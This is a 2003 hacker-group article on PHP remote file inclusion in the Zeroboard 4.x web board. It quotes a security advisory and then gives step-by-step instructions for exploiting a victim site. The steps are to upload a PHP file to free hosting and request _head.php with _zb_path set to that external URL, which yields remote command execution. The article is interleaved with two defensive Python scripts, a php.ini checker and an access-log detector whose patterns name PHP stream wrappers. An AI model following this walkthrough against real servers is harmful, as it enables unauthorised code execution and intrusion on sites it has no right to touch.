======================================================================
# #
# Author: {dr}{nerve} // k0dsweb gr0up #
# This article is the property of the KODSWEB team #
# Any redistribution without our knowledge is strictly forbidden. #
# -= 1.03.2003 =- #
# #
======================================================================
# #
# PHP Source Injection attacks #
# #
======================================================================
This article deals with a fairly common class of web attacks: PHP Source
Injection.
Vulnerabilities of this kind turn up quite often in all sorts of
forums and PHP site engines.
The essence of a PHP Source Injection vulnerability is that an attacker
can inject their own PHP code into the PHP script that runs on the
server.
One day I was wandering around the net and decided to poke around one of
the sites, to check it out, so to speak. My attention was caught by a
ZeroBoard 4.1 board. I remembered having seen a vulnerability in this
board in one of the bugtraqs. Off I went searching. Five minutes later I
had the exploit at hand. Below is the original version of the exploit:
======================================================================
######################################################################
######################################################################
======================================================================
From: I'm I
Date: June 17, 2002
Subject: malicious PHP source injection
----------------------------------------------------------------------
JCC Security Advisory
June 15, 2002
malicious PHP source injection
Description
Zeroboard is one of the popular PHP web boards in Korea.
When allow_url_fopen = On and register_globals = On in php.ini,
Zeroboard has a vulnerability because _head.php contains dangerous code.
So an attacker can include any file into the server's PHP code.
Impact
All versions of Zeroboard 4.x.
Workaround
allow_url_fopen = off and register_globals = off.
Tested systems
Zeroboard 4.1pl2 Debian GNU/Linux SID(x86)
Background
We checked the vulnerability with
"http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE" and
made a sample code, alib.php,
--------------------alib.php--------------
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
--------------------output----------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php
apply_vote.php check_user_id.php comment_ok.php config.php data del_comment.php
del_comment_ok.php delete.php delete_ok.php download.php error.php icon
image_box.php images include index.html install.php install1.php install2.php
install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php
login.php login_check.php logout.php lostid.php lostid_search.php member_join.php
member_join_ok.php member_memo.php member_memo2.php member_memo3.php
member_modify.php member_modify_ok.php member_out.php open_window.php
outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view.php view_info.php view_info2.php view_preview.php
vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in
/home/morris/public_html/tmp/bbs/_head.php on line 41
-----------------------------------------
thx for BlackNight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)
e-mail : morris@xsdeny.net
======================================================================
######################################################################
######################################################################
======================================================================
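The advisory's Workaround names the two php.ini directives whose combination makes the include reachable from outside the server: allow_url_fopen and register_globals. The Python script below is added here as an example; it is not part of the advisory, of Zeroboard or of the original article. It parses a php.ini body and reports whether both directives are effectively on. The three ini texts are constructed samples, and the values assumed when a directive is absent (allow_url_fopen On, register_globals Off since PHP 4.2.0) are PHP's documented built-in defaults.

```python
"""Check a php.ini body for the two directives named in the advisory's workaround."""

# PHP's truthiness rules for ini values: these spellings mean on / off.
_TRUE = {"on", "1", "true", "yes"}
_FALSE = {"off", "0", "false", "no", "none", ""}

# Assumed built-in defaults when the directive is missing from php.ini
# (per the PHP manual: allow_url_fopen On; register_globals Off as of 4.2.0).
DEFAULTS = {"allow_url_fopen": True, "register_globals": False}


def ini_bool(value):
    """Map an ini boolean spelling ("On", "1", '"Off"', ...) to a Python bool."""
    v = value.strip().strip("\"'").lower()
    if v in _TRUE:
        return True
    if v in _FALSE:
        return False
    raise ValueError(f"unrecognised ini boolean: {value!r}")


def parse_php_ini(text):
    """Return {directive: raw value}; ';' comments and [Section] headers are ignored.

    Note: a ';' inside a quoted value is treated as a comment start, which is
    acceptable for the boolean directives this checker cares about.
    """
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        directives[key.strip().lower()] = value.strip()
    return directives


def check_rfi_settings(text):
    """Return (effective settings, exposed) for a php.ini body.

    'exposed' is the advisory's precondition: both directives on at once.
    """
    ini = parse_php_ini(text)
    effective = {
        name: (ini_bool(ini[name]) if name in ini else default)
        for name, default in DEFAULTS.items()
    }
    exposed = effective["allow_url_fopen"] and effective["register_globals"]
    return effective, exposed


# Constructed sample php.ini bodies (not taken from any real install).
VULNERABLE_INI = """
[PHP]
; both directives on: the condition the advisory describes
register_globals = On
allow_url_fopen = On
"""

HARDENED_INI = """
[PHP]
register_globals = Off
allow_url_fopen = Off   ; advisory workaround
"""

MISSING_INI = """
[PHP]
display_errors = On
"""

if __name__ == "__main__":
    for label, body in (("vulnerable", VULNERABLE_INI),
                        ("hardened", HARDENED_INI),
                        ("defaults only", MISSING_INI)):
        effective, exposed = check_rfi_settings(body)
        print(f"{label:14} {effective} -> exposed={exposed}")
```

Run it as-is to see the three verdicts; pointing `check_rfi_settings` at the text of a real php.ini is the only change needed to check a live host. Since the `register_globals` default flipped to Off in PHP 4.2.0, an installation that never set it explicitly is reported as not exposed, while the pre-4.2 default would have to be supplied by editing `DEFAULTS`.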
-== LET'S GET STARTED ==-
The description of how to use this vulnerability is given right there:
http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE"
and made a sample code, alib.php,
--------------------alib.php--------------
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
======================================================================
######################################################################
######################################################################
======================================================================
Do exactly as written there:
Create:
--------------------alib.php--------------
------------------------------------------
Next, go to a free hosting service with FTP access, register
(for example, www.hacker.narod.ru) and upload alib.php into the root directory there.
The path to this file will then be http://www.hacker.narod.ru/alib.php
Next, type into the browser:
http://www.victim.com/zb41/_head.php?_zb_path=http://www.hacker.narod.ru/a
and refresh the page with F5. The request is sent to the server and the command executes.
--------------------the browser shows--------
admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php board_header.html
check_user_id.php comment_ok.php config.php data del_comment_ok.php del_comment.php
delete_ok.php delete.php download.php error.php ext.php _foot.php _head.php icon
image_box.php images include install1.php install2_ok.php install2.php install_ok.php
install.php latest_skin lib.php license.txt linuz_member.php linuz_view_member.php
list_all.php login_check.php login.php logout.php lostid.php lostid_search.php
member_join_ok.php member_join.php member_memo2.php member_memo3.php member_memo.php
member_modify_ok.php member_modify.php member_out.php mem_list.php open_window.php
outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view_info2.php view_info.php view.php view_preview.php
vote.php write_ok.php write.php x.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in /home/nettist/public_html/zb41/_head.php on line 40
------------------------------------------
So this vulnerability allows commands to be executed remotely on the server
and reconnaissance in force to be carried out before further actions.
All feedback/suggestions are accepted at: admin@kodsweb.ru
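Every step above leaves a request in the board's web server log in which the `_zb_path` parameter carries a full URL, so the attempt is easy to spot after the fact. The Python detector below is added here as an example and is not part of the original article or of Zeroboard: it parses Apache combined-format access-log lines, decodes the query string, and flags any parameter whose value starts with a URL scheme or a PHP stream wrapper, which is the shape of a remote inclusion regardless of which script or parameter is targeted. The log lines are constructed samples that reuse the host names from this article; the IP addresses are from documentation ranges.

```python
"""Flag remote-file-inclusion attempts in Apache combined access-log lines."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that would make include() read from outside the web root:
# a remote URL scheme (what allow_url_fopen enables) or a PHP stream wrapper.
REMOTE_RE = re.compile(r'^(?:https?|ftp|ftps)://|^(?:php|data|expect|phar)://', re.I)


def parse_line(line):
    """Return the parsed record (with 'path' and decoded 'params'), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes once; the extra unquote also exposes double-encoded values.
    # keep_blank_values so empty probes like "?_zb_path=" still appear as parameters.
    rec["params"] = [(k, unquote(v)) for k, v in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def find_rfi(lines):
    """Return one finding per parameter whose value looks like a remote include."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if REMOTE_RE.match(value.lstrip()):
                hits.append({
                    "host": rec["host"],
                    "time": rec["time"],
                    "path": rec["path"],
                    "param": name,
                    "value": value,
                    "status": int(rec["status"]),
                })
    return hits


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    # the probe shape described in the article, plain
    '203.0.113.5 - - [01/Mar/2003:12:00:01 +0300] "GET /zb41/_head.php?_zb_path=http://www.hacker.narod.ru/a HTTP/1.0" 200 1523 "-" "Mozilla/4.0"',
    # the same attempt with the value URL-encoded
    '203.0.113.5 - - [01/Mar/2003:12:00:07 +0300] "GET /zb41/_head.php?_zb_path=http%3A%2F%2Fwww.hacker.narod.ru%2Fa HTTP/1.0" 200 1523 "-" "Mozilla/4.0"',
    # ordinary board traffic, must not be flagged
    '198.51.100.9 - - [01/Mar/2003:12:01:00 +0300] "GET /zb41/zboard.php?id=notice&page=2 HTTP/1.1" 200 8812 "http://www.victim.com/" "Mozilla/5.0"',
    # a stream-wrapper probe against the same parameter
    '203.0.113.5 - - [01/Mar/2003:12:02:30 +0300] "GET /zb41/_head.php?_zb_path=php://input HTTP/1.0" 500 0 "-" "curl/7.10"',
]

if __name__ == "__main__":
    for hit in find_rfi(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["host"]} {hit["path"]} {hit["param"]}={hit["value"]} ({hit["status"]})')
```

The same function works on a real log via `find_rfi(open("access_log"))`. Matching on the value rather than on the parameter name `_zb_path` is deliberate: the pattern in this article is one instance of user-controlled include paths, and the same detector covers other scripts and parameter names. A 200 response to a flagged request, as in the first two sample lines, is the case worth escalating, since it means the remote file was fetched and executed rather than rejected.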
[k0dsweb] kodsweb.ru